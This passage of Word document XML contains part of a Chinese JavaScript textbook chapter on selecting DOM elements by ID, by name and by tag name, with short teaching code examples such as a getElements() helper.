        <w:t xml:space="preserve">　通过</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>选取元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素可以有一个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性，在文档中该值必须唯一，即同一个文档中的两个元素不能有相同的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>。可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>方法选取一个基于唯一</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。此方法我们在第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章都已经使用过了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var section1=document.getElementById("section1");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是最简单和常用的选取元素的方法。如果想要操作某一组指定的文档元素，提供这些元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性值，并使用</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>查找这些</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果需要通过</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>查找多个元素，会发现例</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>getElements()</w:t>
      </w:r>
      <w:r>
        <w:t>函数非常有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>：通过</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>查找多个元素</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函数接受任意多的字符串参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>每个参数将当做元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>传给</w:t>
      </w:r>
      <w:r>
        <w:t>document.getElementById()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个对象，它把这些</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>映射到对应</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如任何一个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>对应的元素未定义，则抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getElements(/*ids...*/){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elements={};//</w:t>
      </w:r>
      <w:r>
        <w:t>开始是一个空</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t>映射对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var id=arguments[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>参数是元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=document.getElementById(id);//</w:t>
      </w:r>
      <w:r>
        <w:t>查找元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(elt==null)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果未定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("No element with id:"+id);//</w:t>
      </w:r>
      <w:r>
        <w:t>抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>lements[id]=elt;//id</w:t>
      </w:r>
      <w:r>
        <w:t>和元素之间映射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return elements;//</w:t>
      </w:r>
      <w:r>
        <w:t>对于元素映射返回</w:t>
      </w:r>
      <w:r>
        <w:t>id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在低于</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>版本的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>对匹配元素的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>不区分大小写，而且也返回匹配</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="15_2_2_Tong_Guo_Ming_Zi_Xuan_Qu_Yuan_Su_"/>
      <w:r>
        <w:t>15.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　通过名字选取元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性最初打算为表单元素分配名字，在表单数据提交到服务器时使用该属性的值。类似</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>是给元素分配名字，但是区别于</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值不是必须唯一：多个元素可能有同样的名字，在表单中，单选和复选按钮通</w:t>
      </w:r>
      <w:r>
        <w:t>常是这种情况。而且，和</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>不一样的是</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性只在少数</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素中有效，包括表单、表单元素、＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值选取</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var radiobuttons=document.getElementsByName("favorite_color");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>定义在</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>类中，而不在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>类中，所以它只针对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档可用，在</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中不可用。它返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，后者的行为类似一个包含若干</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的只读数组。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>也返回</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性匹配指定值的元素。为了兼容，应该小心谨慎，不要将同样的字符串同时用做名字和</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中我们看到，为某些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素设置</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值将自动为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象中创建对应的属性，对</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象也类似。为＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>applet</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（其中只有＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:r>
        <w:t>没有后备对象）设置</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值，即在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象中创建以此</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为名字的属性（当然，假设此文档还没有该名字的属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果给定的名字只有一个元素，自动创建的文档属性对应的该值是元素本身。如果有多个元素，该文档属性的值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对象，它表现为一个包含这些元素的数组。如</w:t>
      </w:r>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节所示，为若干命名＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素所创建的文档属性比较特殊：它们指代这些框架的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象而不是</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这就意味着有些元素可以作为</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>属性仅通过名字来选取：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>针对＜</w:t>
      </w:r>
      <w:r>
        <w:t>fo</w:t>
      </w:r>
      <w:r>
        <w:t>rm name="shipping_address"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，得到</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var form=document.shipping_address;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍了为什么不要用为窗口对象自动创建的属性，这同样适用于为文档对象自动创建的属性。如果需要查找命名的元素，最好显式地调用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>来查找它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="15_2_3_Tong_Guo_Biao_Qian_Ming_Xuan_Qu_Y"/>
      <w:r>
        <w:t>15.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　通过标签名选取元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可用来选取指定类型（标签名）的所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>元素。例如，如下代码，在文档中获得包含所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的只读的类数组对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var spans=document.getElementsByTagName("span");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象（关于</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>类，见本节的补充信息）。在</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>中返回的元素按照在文档中的顺</w:t>
      </w:r>
      <w:r>
        <w:t>序排序的，所以可用如下代码选取文档中的第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var firstpara=document.getElementsByTagName("p")[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签是不区分大小写的，当在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中使用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它进行不区分大小写的标签名比较。例如，上述的变量</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>将包含所有写成＜</w:t>
      </w:r>
      <w:r>
        <w:t>SPAN</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>传递通配符参数</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>将获得一个代表文档中所有元素的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>类也定义</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>etElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，其原理和</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>版本的一样，但是它只选取调用该方法的元素的后代元素。因此，要查找文档中第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素里面的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var firstpara=document.getElementsByTagName("p")[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var firstParaSpans=firstpara.getElementsByTagName("span");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由于历史的原因，</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>类定义一些快捷属性来访问各种各样的节点。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>images</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>forms</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>links</w:t>
      </w:r>
      <w:r>
        <w:t>等属性指向行为类似只读数组的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞（但只包含那些有</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签）元素集合。这些属性指代</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLCollection</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它们很像</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，但是除此之外它们可以用元素的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>或名字来索引。早些时候，我们已经看到用如下的表达式来引用一个命名的＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
